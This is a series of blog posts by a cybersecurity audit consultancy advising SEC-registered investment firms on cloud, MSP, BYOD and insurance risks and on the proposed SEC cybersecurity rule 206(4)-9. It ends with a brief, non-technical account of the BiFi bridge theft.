ThreatWire

The Pros and (Mostly) Cons of RIAs Moving to the Cloud

The Pros and (Mostly) Cons of RIAs Moving to the Cloud

The “cloud” has revolutionized computing as we know it, providing SEC registered financial institutions with the ability to quickly deploy an online presence, scale as demand ebbs and flows, and provides the foundation for a remote workforce.

However, this convenience comes with its own set of challenges, and the race to “move to the cloud” has frequently left registered firms and their clients with an entirely new set of security challenges, data-privacy issues, and a significant regulatory compliance workload that they aren’t prepared to face. In this article, we will explore the pros and cons of moving to the cloud as an RIA.

These issues will be even more pronounced with the introduction of the SEC’s new cybersecurity regulation, 206(4)-9.

The Pros of Moving to the Cloud

There are many reasons why RIAs choose to move to the cloud. Perhaps the most appealing reason is the convenience factor. With the cloud, organizations can quickly deploy an online presence without having to invest in on-premises infrastructure. Additionally, the cloud provides organizations with the ability to scale as demand ebbs and flows. For example, during a pandemic when many employees are working remotely, a company may need to increase its cloud capacity to accommodate the influx of traffic.

Another advantage of moving to the cloud is that it can help organizations save money. With on-premises infrastructure, companies have to pay for hardware, software, maintenance, and energy costs. However, with cloud computing, these costs are often included in the monthly service fee. Additionally, because cloud providers frequently offer pay-as-you-go pricing models, companies only have to pay for the resources they use – making it a more cost-effective option in the long run.

The Cons of Moving to the Cloud

However, there are also some disadvantages of moving to the cloud that financial institutions need to be aware of before making the switch. One of the biggest lies ever told is that the cloud provides security. It doesn’t. When data is stored off-site on servers that are managed by a third-party provider, there is always a risk that sensitive information could be compromised. And cloud compromises happen frequently. Additionally, because cloud environments are often complex and dynamic (with multiple users accessing data from different locations), it can be difficult for IT teams to monitor for potential security threats. These cloud providers usually don’t bother checking for breaches/compromises proactively and in many cases, they won’t even tell their customers about notifications of these problems from external researchers.

What problems do I find most frequently when performing security audits for clients?

I have found countless VM images with unpatched vulnerabilities and some that contain malware or coin miners. Furthermore,

Cloud marketplaces are replete with pre-built VMs for customers to use, and while this is a convenient method, it often opens the door for an attack. These images can be outdated or have overly permissive firewall settings which make them an easy target. Another problem has been the introduction of VM images that come pre-installed with malware or crypto-currency miners.

While these attacks are threatening, they’re only the beginning in terms of what’s possible. An attacker that is properly motivated could create a VM image that would contact the malware operators and establish a command-and-control connection after a set amount of time has passed.

Furthermore, with the rise in hybrid-cloud deployments and point-to-point VPNs connecting cloud environments to a customer’s on-premises network, a vulnerability on a cloud VM could easily become a pathway to the heart of an organization’s network.

While cloud providers do scan VM images for malware before allowing them to be used, these scans only detect KNOWN and UNALTERED malicious code. This is not a complete defense against all threats and doesn’t protect from real-world threats. For example, a simple cron job on a Linux VM or scheduled task in Windows could easily download secondary payloads days or weeks after provisioning and never be detected.

Not only this, but cloud providers such as AWS often allow any user to share a VM image in the marketplace. Similar to the risk mobile app stores pose, using these types of VMs can have dangerous enterprise consequences if utilized.

Client privacy issues are a huge concern when moving to the cloud. Because data is stored off-site on servers that are managed by a third-party provider, there is always a risk that sensitive information could be accessed by unauthorized individuals. Cloud deployments are a frequent source of data leaks (S3 buckets, open databases, SQL servers ) for otherwise secure organizations.

Given that security is of utmost importance for the companies sustaining major clouds, such as Azure, AWS, Google Cloud Platform (GCP), etc., said companies have implemented extremely well-developed processes to secure their hypervisor layers. However, because these organizations provide infrastructure/platform/software solutions a majority of the work falls on the customer’s shoulders to secure their particular environment.

Lastly, most cloud providers collect broad swaths of user data (e.g., usage statistics and personal information) for either marketing efforts or third-party sales without users’ prior consent. This should cause anyone to pause about how our (and our client’s) sensitive information is being used and by whom, especially when it’s stored off-site on servers we don’t have control over.

Although cloud networking is not automatically insecure, organizations should understand that their security strategy for the cloud needs to be as strong as an on-premises environment. With the world moving towards a remote workforce operating in a hybrid or cloud-centric environment, these companies cannot believe that added security comes along when you are working with Seattle, Redmond or Bay Area tech giants.

There are both advantages and disadvantages to moving to the cloud, which organizations should weigh carefully before making a decision. Some benefits of moving to the cloud include convenience and cost savings, while some risks include data security threats associated with storing data off-site on servers managed by a third party.

If you do decide to go to the cloud, make sure your are comparing your configuration settings against a known benchmark, such as the CIS AWS Foundations Security Benchmark.

Need help auditing your cloud environments? MTradecraft can help. We are not affiliated with any cloud services which allows us to act as a true consultant to our clients.

The Dangers of MSPs for SEC and FINRA Registered Firms

The Dangers of Managed IT Service Providers (MSPs) for SEC-registered Firms.

(And Knowing When to RUN away from them)

There is a conflict of interest between every MSP and their clients which makes MSPs an insider threat to every SEC or FINRA registered firm’s processes and systems. They have unrestricted access to a client’s network and systems, which gives them the ability to do serious damage if they are not properly supervised.

In this blog post, I will explore the dangers of MSPs, how to audit their work, and how to protect your firm from them. While I am not saying every MSP is like this, I will say that the vast majority I have encountered within my 200+ cyber audits are.

So what is the big problem?

The goals of the MSP and their clients never align.

In the cybersecurity world, there is a very real balance between “security” and “convenience”. The more secure a system is, the less convenient its usage. And Vice-Versa.

The goal of every MSP is to deliver templated technology solutions (or a package of solutions) to as many clients as possible. The MSP is generally going to err on the side of convenience when deploying these packages because that decreases the MSPs workload both in implementation and support. When they err on the side of convenience they neglect security and leave vulnerabilities open across the client’s network.

The goal of the client (the SEC or FINRA registered firm) is Security and having the MSP provide that security is often in direct conflict with the MSP’s ability to conveniently deliver their solutions.

Thus, their goals in the service never align.

Here are some of the problems I think need to be discussed in the industry right now as the SEC continues to roll out the new cybersecurity regulations known as 206(4)-9.

To start, every firm should understand that solutions also come with problems. While hiring an MSP may help your IT department’s workload, it adds significant complexity to the Compliance department’s workload.

Here are the issues:

MSPs Have Unrestricted Access to Your Network and are frequent targets of attack:

MSPs have full access to your network and systems. This includes all of your data, applications, and devices. They also can make changes to your system configurations. This level of access makes MSPs a prime target for cyber criminals. If an MSP employee is compromised, the attacker can gain full access to your network and systems. This could allow them to steal sensitive data, install malicious software, or even shut down your entire network. Do you trust your MSP to report this breach to you? Don’t. They won’t. An MSP reporting a breach to you would cause reputation risk, revenue loss, as well as potential litigation.

MSP Employees Are Not Properly Supervised

MSP employees are not always properly supervised. This means that they may not be following proper security procedures when working on your network and systems. Additionally, MSP employees may not be properly trained in cybersecurity best practices. This could lead to them making mistakes that could put your firm at risk. For example, an MSP employee could accidentally delete critical files or fail to apply security patches in a timely manner.

How to Protect Your Firm from MSP Insider Threats

There are several steps that you can take to protect your firm from MSP insider threats:

1. Vet Your MSP: Be sure to thoroughly vet your MSP before giving them access to your network and systems. Make sure that they have a good reputation and that their employees are properly trained in cybersecurity best practices. Ask to see third-party audit reports. If they don’t have them this firm is not your friend. Your MSP should already have these reports and be proud to share these reports with you. If they aren’t, something is very wrong and the MSP is not working in your best interest.

2. Monitor Your Network: Be sure to self-monitor your network for any suspicious activity. This includes monitoring for unauthorized changes to system configurations and unusual patterns of data usage. During an examination, the SEC will want to see where you are verifying the MSPs security duties.

3. Restrict Access: Be sure only to give MSP employees the minimum amount of access necessary to perform their job duties. Do not give them any unnecessary privileges that could potentially be abused. When they request access to a system, ask the MSP to submit the request in writing to explain why they need access to those systems. Also ask the MSP to submit reports of which employees have access to your systems and what level of access they have. This all needs to be documented for the SEC and FINRA.

4. Educate Your Employees: Be sure to educate your employees about the dangers of working with unsecured networks and systems. Make sure that they know how to spot suspicious activity and what steps to take if they believe that their account has been compromised. If you have less than 11 employees, you can implement the FieldCraft cybersecurity awareness training program for free. [ https://www.fieldcraft.training ]

5 . Implement Multi-Factor Authentication: Be sure the MSP implements multi-factor authentication for all user accounts, including accounts used by MSP employees. This will help reduce the risk of attackers gaining access to your network if an employee’s credentials are compromised. Oftentimes, MSPs do not use MFA because it adds to the time and complexity of their workload. Having MFA solves 99% of cybersecurity problems. If your MSP does not implement MFA by default….RUN.

By taking these steps, you can help protect your firm from the dangers of MSP insider threats.

In conclusion, many firms think hiring an MSP solves all their IT problems. While it does solve IT problems, it adds significant work to the Compliance department and to the CISO. It is important to be aware of the dangers of MSP insider threats and take steps to protect your firm from them.

By thoroughly vetting your MSP, monitoring your network, restricting employee access, educating your employees, and implementing multi-factor authentication, you can help reduce the risk of an attack on your firm.

Of course, if you need help with any of this work, MTradecraft would love to assist.

(To be clear, we don’t sell MSP services. We just do the audits.)

Why Cybersecurity Awareness Training is Important for SEC Registered Firms

Earlier this year, the SEC announced Rule 206(4)-9 as part of their sweeping overhaul of cybersecurity regulations. We are moving from a period where the SEC provided cybersecurity “guidance” to a period of cybersecurity “regulation”.

One of these proposed rules will require that firms must provide cybersecurity awareness training to their employees on an annual basis. Providing cybersecurity awareness training is the second most important cybersecurity tip we can offer. (Use 2FA on all accounts, is the first)

In order to understand why cybersecurity awareness training is so important, it’s first necessary to understand what cyberattacks are and how they work. A cyberattack is any type of attack that is carried out using electronic means. These attacks can take many different forms, but they all have one thing in common: they exploit vulnerabilities in order to gain access to sensitive information or systems.

The most common type of cyberattack is a phishing attack. Phishing attacks use emails or other communications that look legitimate in order to trick the recipient into giving up sensitive information, such as login credentials or financial information. Once the attacker has this information, they can use it to gain access to systems or steal money.

Another common type of attack is a malware attack.

Malware is short for malicious software, and it refers to any software that is designed to harm a computer system. Malware can be used to disable systems, delete files, run up toll charges, or even steal information. One of the most famous examples of malware is the WannaCry ransomware attack, which infected millions of computers around the world and caused billions of dollars in damage.

These are just two examples of the many different types of cyberattacks that exist. It’s important for businesses to be aware of all the different types of attacks that exist so that they can be better prepared to defend against them. This is where cybersecurity awareness training comes in.

MTradecraft provides this training to our clients through our FieldCraft platform. FieldCraft provides employees with the knowledge they need to identify and defend against common cyberattacks and tests their skills with real world simulations.

When employees are trained in cybersecurity best practices, they are better equipped to spot attacks when they occur and take steps to prevent them from happening in the first place. Cybersecurity awareness training can also help businesses create a culture of security within their organization, which can further reduce the risk of an attack occurring in the first place.

The SEC’s proposal for mandatory cybersecurity awareness training is a step in the right direction towards protecting registered firms from cyber threats. By teaching employees about common attacks and how to defend against them, firms can significantly reduce their risk of being breached. In addition, creating a culture of security within an organization can help further reduce the risk of an attack occurring in the first place. All SEC and FINRA registered firms should take this rule seriously and implement mandatory cybersecurity awareness training for their employees as soon as possible.

The U.S. Securities and Exchange Commission (SEC) announced charges against 18 individuals that used hacked brokerage accounts to trade stocks and launder money.

A few days ago, the SEC announced charges against 18 defendants in an international scheme to manipulate stocks using hacked US brokerage accounts.

In February of 2021, I hosted a webinar where we simulated a cyber attack on a hedge fund to show how hackers could potentially compromise brokerage accounts and make money in micro-caps by counter-trading the buy-orders stemming from the hacked accounts.

Below is a recording of that webinar if you are interested in understanding the mechanics of how this attack might have been conducted:

The SEC’s complaint alleges that hackers accessed at least 31 US retail brokerage accounts in late 2017 and early 2018, using them to purchase the securities of Lotus Bio-Technology Development Corp. and Good Gaming, Inc.

The illegal purchases allowed con-artists, who already had a lot of Lotus Bio-Tech and Good Gaming stock, to sell their inventory at higher than normal prices and make more than $1 million in illicit proceeds.

According to the complaint, Davies Wong of British Columbia, Canada, and Glenn B. Laken of Illinois controlled the majority of the Lotus Bio-Tech and Good Gaming stock that was sold while Mohamed coordinated with Wong, Laken, and others to illegally carry out online attacks to artificially manipulate market prices.The complaint claims that Richard Tang of British Columbia, Canada, was a member of both the Lotus Bio-Tech and Good Gaming frauds.

7 Steps to Compliant and Effective SEC Cybersecurity Operations

The SEC has released new regulations on cybersecurity practices for registered firms. These regulations are collectively known as 206(4)-9 In this blog post, we’ll .outline the seven steps your firm needs to take to strengthen its cybersecurity posture and meet the expectations of regulators.

  1. Establish a Board-Level Cybersecurity Oversight Function
    The first step is to establish a board-level cybersecurity oversight function. This doesn’t mean creating a new board committee devoted solely to cybersecurity (although that’s an option). Instead, it means assigning responsibility for cybersecurity governance to an existing board committee, such as the audit committee, and ensuring that the committee receives regular updates on the state of your company’s cybersecurity program.
  2. Conduct a Risk Assessment
    Your second step is to conduct a risk assessment to identify the specific cyber risks and threats facing your company. There are many different frameworks you can use for this purpose, but the SEC wants you to use the NIST Cybersecurity Framework because it’s well-recognized and widely used. Once you’ve identified your company’s specific risks, you can develop appropriate mitigation strategies.
  3. Develop a Cyber Incident Response Plan
    Your third step is to develop a cyber incident response plan. This should include both technical and non-technical components, and it should be regularly tested and updated. The plan should be tailored to your company’s specific risks and needs, but it should at least address communication protocols, data backup and recovery procedures, and employee training. Some firm’s include this as part of the firm’s overall BCP (Business Continuity Plan) while others draft a separate document to cover cyber related incidents.
  4. Implement Access Control Measures
    Your fourth step is to implement access control measures to restrict access to sensitive information on a need-to-know basis. This includes both physical and logical access controls, such as user authentication requirements (e.g., strong passwords) and least privilege principles (e.g., granting employees access only to the information they need to do their jobs).
  5. Implement Data Loss Prevention Measures
    Your fifth step is to implement data loss prevention (DLP) measures. DLP refers to any measure taken to prevent sensitive data from leaving your company’s network without authorization. This might include encrypting data in transit, implementing comprehensive activity logging, or deploying DLP software solutions.
  6. Train Employees on Cybersecurity Procedures
    Your sixth step is training employees on security procedures—including both technical procedures (e..g., how to spot phishing emails) and non-technical procedures (e..g., what to do if they suspect they’ve been breached). Employee training should be ongoing and should account for changes in threats over time.
  7. Monitor Your Network for Suspicious Activity
    Your seventh and final step is continuous monitoring of your network for suspicious activity using both automated tools (e.g., intrusion detection systems) and manual processes (e.g., periodic reviews of system logs and vulnerability scans). This will help you detect malicious activity quickly so you can take steps to contain any damage caused by a breach.

Following these seven steps will help your firm achieve compliance with the SEC regulations on cybersecurity—and make your organization more secure in the process! If you need assistance implementing any of these steps, MTradecraft would be happy to help!

Webinar Recording: A Discussion on BYOD Policies at SEC Registered Firms.

In this webinar we discuss the dangers of Bring Your Own Device (BYOD) policies for SEC registered firms. BYOD policies can be a major security risk for firms as they open up the possibility for sensitive data to be accessed and stolen by malicious actors.

I’m not here to sell you a solution. There isn’t one. This is just the opinion of someone who has worn the CCO and COO hat for years, and now works as an ethical hacker having performed over 200 security audits and penetration tests against SEC registered firms.

Bring Your Own Device Policies are a Total Nightmare for SEC Registered Firms

Allowing employees to use their own personal devices for work is a stupid idea for all SEC registered firms.

I’m not here to sell you a solution. There isn’t one. This is just the opinion of someone who has worn the CCO and COO hat for years, and now works as an ethical hacker having performed over 200 security audits and penetration tests against SEC registered firms.

TLDR: Do not allow a BYOD policy at your firm.

The first thing I hear from CCO’s is “But our MSP (Managed Service Provider) has set up a MDM (Mobile Device Management) solution.”

My answer is always, “No, your MSP sold you on an MDM solution that doesn’t solve your compliance obligations.”

MDM software can help with most of the issues below, but I have yet to see one that is cut out to pull the compliance requirements of SEC-registered firms in a compliant way. For you legal nerds out there, we are looking at Advisers Act Rule 204-2 (Books and Records Rule) and 206(4)-7 (Compliance Rule) in terms of maintaining compliant communications records. 206(4)-9 will also touch on this when it hits the books April 2023.

If your SEC-registered firm decides to allow employees to use their personal mobile devices for work purposes, you should be aware of the following risks:

1. Data theft

If you allow your personnel to use their own devices unchecked, likely, some of the personal programs they use will not be as stringent with security standards. An account they have for personal usage may eventually lead to corporate data and sensitive information being revealed if it is hacked.

2. Malware

Employees use personal devices to download various types of information and files, such as PDF, applications, and um….Porn. Corporate data security is at risk if employees aren’t able to discern between work-related and personal data. Games and porn downloaded or viewed with mobile devices are often associated with hidden viruses or malware, for example. If an employee logs into the company network from their infected device, the entire system could be jeopardized by passing along the malware to work systems.

3. Legal problems

A business’s reputation may be destroyed in the event of a security breach. If an employee-owned device results in a leak or breach of corporate data, this might result in serious consequences, such as potential litigation.

Working with legal counsel to develop sound policies is crucial for protecting your organization from costly and potentially devastating lawsuits, especially if you decide to allow a BYOD policy.

4. Lost or stolen devices

The best-case situation is that a worker’s device gets stolen or goes missing, and this is inconvenient. In the worst-case scenario, you’re dealing with a catastrophic disaster. Loss or theft of the employee’s device might result in a major breach if they weren’t following corporate security standards when using it. For example, the employee may store their passwords (both personal and business) in an unsecured notes program, making it easy for someone who obtains the device to breach corporate accounts.

Even if the employee followed the policy to the letter, hacking/cracking technology has advanced so much in recent years that a strong password or fingerprint verification may not be enough to keep them out of the device. Mobile device management (MDM) software might help businesses solve this issue by allowing them to remotely erase devices so hackers don’t have a chance to steal sensitive data. On the other hand, MDM software is extremely invasive to an employees privacy (See #8)

5. Improper mobile management

A staff member leaving an organization creates a potential security vulnerability if they still have access to company data on their personal mobile devices. To prevent an employee from continuing to access systems or apps after they leave the company, companies must be able to reset passwords and revoke access immediately. If a security breach does occur, tracking down the device responsible should also be possible. If you just fired an employee, do you think they would be willing to cooperate? Hell no.

6. Insufficient employee training

Many security breaches are caused by carelessness or human error. Most of the time, this occurs when an employee is unaware of their company’s policy on security, especially regarding devices. When you’re training employees in device security, think about the best way to communicate the information to them. If you need a training program, I highly recommend you check out free training program called FieldCraft. It is compliant with SEC and FINRA regulations and we offer a no BS-attached free version available to firms with less than 10 employees.

7. Shadow IT

Shadow IT is where company employees use technology that is not approved or managed by the company’s IT department, and it is becoming a big problem in many businesses. When employees bring in consumer-grade technologies and goods without the supervision or management of their IT department or MSP, a slew of issues can result. Any software or hardware an employee introduces without your review or approval poses a potential hazard, whether it’s a USB drive with potential malware on it or an open-source program with low-security standards.

8. Invasion of Privacy

If you are an SEC-registered business, you must keep track and record all communications with clients. If you allow your employees to text message your clients, you must monitor all of their text message conversations. There is no automated method for telling whether an employee’s text message communication is intended for a friend or family member vs a client. As a result, you must keep track of them all. No, thanks.

Your Cybersecurity Insurance is Absolutely Worthless…and it will get worse.

To be clear, I am not trying to sell you a policy. I don’t sell policies. And, I don’t have a recommendation for a policy. I don’t have a solution for you because every policy I have seen is worthless.

Which is why I always say….

“Your cybersecurity insurance policy is absolutely worthless, but I would never want to go through an SEC audit or examination without one”.

This is a line I have been towing for years. I have covered the topic in several webinars. A recording of the latest is below.

Now, it is going to get worse…

Starting 31 March 2023, insurance companies will require all standalone cyber attack policies to include a clause excluding liability for losses arising from state-backed cyber attacks. This is in addition to the “war” clause that already exists and is so problematic.

The new clause will exclude any losses due to a war–declared or not–even if the policy has a separate war exclusion. In addition, it must also exclude any losses arising from state-sponsored cyberattacks that disable a firm’s ability to function properly.

Furthermore, the contracts will now have a stipulation on whether cover excludes IT systems not located in the country “under attack”, and it should set a clear standard for how the involved parties will reach an agreement if any state-sponsored cyberattack originates from one or more countries.

The evolving risk of cyber-related business was noted by one firm, Lloyd’s. They warn that if not managed properly, it could lead to significant losses for syndicates that would be difficult to recover from.

“The ability of hostile actors to easily disseminate an attack, the ability for harmful code to spread, and the critical dependency that societies have on their IT infrastructure, including to operate physical assets, means that losses have the potential to greatly exceed what the insurance market is able to absorb,” Lloyd’s added.

MTradecraft agrees. Especially considering that a large majority of FinTech providers have a widespread and little to no cybersecurity budget.

Lloyd’s stated that it is aware many managing agents already have clauses specifically excluding war and non-war state-sponsored cyber-attacks, but they need to be of a high standard with solid wordings.

“We consider the complexities that can arise from cyber-attack exposures in the context of war or non-war, state-backed attacks means that underwriters should ensure that their wordings are legally reviewed to ensure they are sufficiently robust,” said Lloyd’s.

Starting March 31, 2023, this new requirement will go into effect for every policy–both at its inception and renewal.  Note, that this coincides with the SEC’s new cyber regulations known as 206(4)-9.

So again, please understand your cybersecurity policy is worthless. Unfortunately, the SEC and your clients expect you to have coverage.

Your only defense is to do your required cyber audits (SEC 206(4)-9) so that you patch systems, plug open ports, train your employees, and manage your vulnerabilities before they are discovered by malicious hackers…or your insurance company.

An Overview of the SEC’s New Cybersecurity Regulation

In March, the Securities and Exchange Commission (SEC) proposed new cybersecurity risk management rules for organizations including registered investment advisers, registered investment companies, and business development companies (registered funds).

The SEC is also proposing numerous modifications to existing rules governing investment adviser and registered fund disclosures.

This 200+ page rule is dedicated to strengthening existing standards and encouraging firms to upgrade their cybersecurity risk management procedures. Cybersecurity has been at the forefront of the SEC’s examinations and we can expect that focus to increase now that the new regulation ( known as 206(4)-9 ) will move us from a period of cybersecurity “guidance” to a period of cybersecurity “regulation”.

I have covered this topic in a past webinar. If you prefer a recorded version of this information, I highly encourage you check out the YouTube Link below.

Here is the YouTube link.

How does this affect your firm?

According to the accompanying Cybersecurity Risk Management Fact Sheet released by the SEC (Link Here) the planned regulation would have a significant impact on registrants’ cybersecurity measures in a number of key areas.

The New SEC Cybersecurity Regulations will Require: 

  • You will now be required to implement written cybersecurity policies and procedures that are designed to address cybersecurity risks, including the risks of using interconnected systems and networks directly and through IT vendors, cloud providers, and MSPs;
  • You are now required to perform vulnerability scans and penetration tests
  • Firms will now be required to maintain records related to cybersecurity programs and their outcomes, as well as data breaches; and systems logs.
  • Firms will now have to disclose cybersecurity risks and incidents to the adviser’s clients and prospective clients; (See our webinar on why this is a disastrous and dangerous requirement)
  • Registered advisers will now be required to report significant cybersecurity incidents to the SEC, and file Form-ADV-C

The new cybersecurity risk management and recordkeeping rules would be put in place under the Investment Advisers Act of 1940 (“Advisers Act”) and the Investment Company Act of 1940 (“Investment Company Act”), which already require registered advisers and funds to evaluate certain cybersecurity risks while developing policies and procedures.

To summarize, organizations will be forced to take additional proactive steps that will undoubtedly increase the burden and costs of their compliance workflows with registrants required to examine the design and efficacy of their cybersecurity measures on an annual basis and produce a written report as a result of those audits.

I will go through some of the most important aspects of the SEC’s new proposed rule below.

Cybersecurity Risk Management Rules

All registered advisers and funds must “adopt and implement written policies and procedures that are reasonably designed to address cybersecurity risks” under rules 206(4)-9 of the Advisers Act and 38a-2 of the Investment Company Act, according to the SEC.

Given the ever-changing nature of threats, the SEC feels that the proposed cybersecurity regulation would be adaptable, allowing companies to tailor their security efforts based on their particular operations and complexity, as well as changing cybersecurity risks.

The proposed rule addresses several crucial aspects of a cybersecurity strategy:

  • Risk and Threat assessments: requires registered advisers and funds to conduct periodic risk assessments of the network’s vulnerabilities as well as service providers that have been granted access to the network.
  • User security and access: produce evidence of minimizing user-related risks and prevent unlawful access to the network by mandating policies that follow existing cybersecurity standards.
  • Information protection. Firms would be required to assess the sensitivity of data on their network and actively monitor IT systems to identify suspicious activity.
  • Threat and Vulnerability Management. The new risk management rule would require registered advisers and funds to monitor systems and industry or government cyber threat information for them to detect, mitigate, and remediate cybersecurity hazards and vulnerabilities.
  • Cybersecurity Incident Response. Firms will need to have procedures in place to identify, react to, and recover from a cyber-related disruption.

Interested in seeing the technical/nerdy aspects of how you or your IT firm will have to deal with these requirements?

I cover that topic in this YouTube video.

Reporting of Significant Cybersecurity Incidents to the SEC

The SEC is proposing a new regulation that would require advisers to provide confidential information on Form ADV-C “promptly but not more than 48 hours” after establishing a reasonable basis to believe that a significant adviser cybersecurity problem or a significant fund cyber incident has occurred or is occurring. This is EXTREMELY problematic for reasons that we have covered extensively in videos and other write-ups.

Additionally, the proposed rule would also require registered advisers to amend any previously filed Form ADV-C promptly, “but in no event more than 48 hours, after information reported on the form becomes materially inaccurate; if new material information about a previously reported incident is discovered; and after resolving a previously reported incident or closing an internal investigation about a previously disclosed incident.”

This timeline for breach reporting to the SEC under the proposed rule would be one of the strictest in the industry when compared with other reporting regimes and I can tell you from years of doing this kind of work that the timeline is completely unrealistic.

Annual Review

On an annual basis, firms would have to reevaluate their cybersecurity policies and procedures. They would then need to generate a written report documenting security assessments, recording security incidents, and discussing any policy changes (that are material) since the last report.

New Record Keeping Requirements

The new rule will introduce further record-keeping obligations in the form of maintaining five years of cybersecurity policies, annual written cybersecurity audits, risk assessments, breach notification notices, and records documenting “any cybersecurity incidents”. This is going to be extremely expensive and a barrier to entry for many firms.

Disclosure of Cybersecurity Risks and Incidents

The proposed changes would add a new Item 20, “Cybersecurity Risks and Incidents,” to the Form ADV Part 2A…….which is made available to the public!

Scary. I know.

Does your firm need help to understand the new regulations?

MTradecraft can help.

Hacker Tales: How Did BiFi get BuFu’d out of $2.25MM?

Let’s discuss BiFi.

A few weeks ago, an attack was launched against BIFROST’s BiFi service. The hacker was able to steal 1,852 ETH ($2.25 million) from the project by exploiting a security hole in the service’s address management system.

If you are going to dabble in ponzi schemes, you better know what the hell you are doing because there is always a better scammer. Here is how one such better scammer took advantage of the flaw:

BIFROST is a cross-blockchain bridge that requires a mechanism for monitoring deposits on one blockchain to allow withdrawals on another.

When a user deposits Bitcoin into the service, the address issuing server generates and digitally signs an address for that person. The address is then accepted and functional on the BiFi platform after this digital signature is verified. The user may then deposit money to that address and transfer assets across the cross-chain bridge.

This method relies on the address issuing server’s private key, which is then used to generate these digital signatures. The attacker was able to gain access to this key, allowing them to produce a genuine digital signature for a deposit address of their choosing.

When the hacker sent bitcoin to their deposit address, BiFi service interpreted it as a deposit into the service. This gave the attacker access to a fake balance in BiFi that allowed them to drain the coffers with bogus withdraws. Because the deposited address was under control of the attacker, they were able to keep the phony BTC deposit as well.